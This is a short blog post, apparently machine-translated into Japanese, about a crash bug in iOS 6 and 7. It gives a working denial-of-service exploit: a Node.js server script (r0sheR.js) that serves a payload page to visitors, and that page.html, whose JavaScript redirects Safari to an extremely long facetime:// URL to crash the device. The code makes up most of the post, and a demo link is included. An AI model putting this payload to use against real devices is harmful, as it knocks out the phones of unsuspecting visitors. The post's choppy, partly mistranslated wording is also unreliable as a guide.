iOSを再起動します。 シンプルで上品な

皆さん、素敵な時間をお過ごしください!

残念ながら、この投稿は非常に短いですが、これは多くのiOSデバイスが影響を受ける脆弱性のデモンストレーションです。











7番目のブランチのほぼすべてのiOSデバイスが公開され、一部は6番目です。 もうテストできませんでした。 お使いのデバイスの動作に関するコメントの購読を解除していただければ幸いです。



仕事のデモンストレーション:



(alas、すでに欠席)



r0sheR.js:



console.log(" _____ _ ______ _ "); console.log(" | _ | | | | ___ \\ (_) "); console.log(" _ __| |/' | ___| |__ ___| |_/ / _ ___ "); console.log("| '__| /| |/ __| '_ \\ / _ \\ / | / __|"); console.log("| | \\ |_/ /\\__ \\ | | | __/ |\\ \\ _| \\__ \\"); console.log("|_| \\___/ |___/_| |_|\\___\\_| \\_(_) |___/"); console.log("r0sheR.js is a part of IOS EX kit _/ |"); console.log(" fil9 (2013) fil9bob@gmail.com |__/"); var lport = process.argv[2]; if (!lport) { console.log('Usage: ' + process.argv[0] + ' ' + process.argv[1] + ' [80,8080...]'); process.exit(1) } else { if (lport <= 0 || lport > 65535) { console.log("Invalid port!\n"); process.exit(1) } }; var http = require('http'),fs=require('fs'); http.createServer(function (rq, rs) { rs.writeHead(200, { 'Content-Type': 'text/html' }); console.log('[!] New request from: ' + rq.connection.remoteAddress); console.log('[!] UserAgent: ' + rq.headers['user-agent']); fs.readFile('./page.html', function(err,data){ if (err) throw err; rs.end(data); }); console.log('DOS parcel sent :)') }).listen(lport, '0.0.0.0');
      
      







page.html:<-個別にペイロード。 練習は、それがより便利であることを示しています

 <html> <head> <title>IOS 7 CRASH</title> </head> <body> <script> document.location.replace("data:text/html,%3Cscript%3Eif(navigator.userAgent.indexOf('Safari') != -1){var a,b='';for(var i=1;i<=300000;i++) a='A'+a; document.location.replace('facetime://'+a+a+a+a)}%3C/script%3E"); </script> </body> </html>
      
      







デモ: http : //sn.im/28gw4wx



バグは、SafariでFaceTimeを直接実行できることです。 攻撃者はこれを利用してサービス不能を引き起こす可能性があります。 さて、そして何か他のもの。



PS:最近、iOS 7.0.5のバージョンでevasi0n7が使用する脆弱性が解決されることがわかりました。

誰が知っている、多分あなたはiOS 7.1用のJBを期待する必要があります:)



All Articles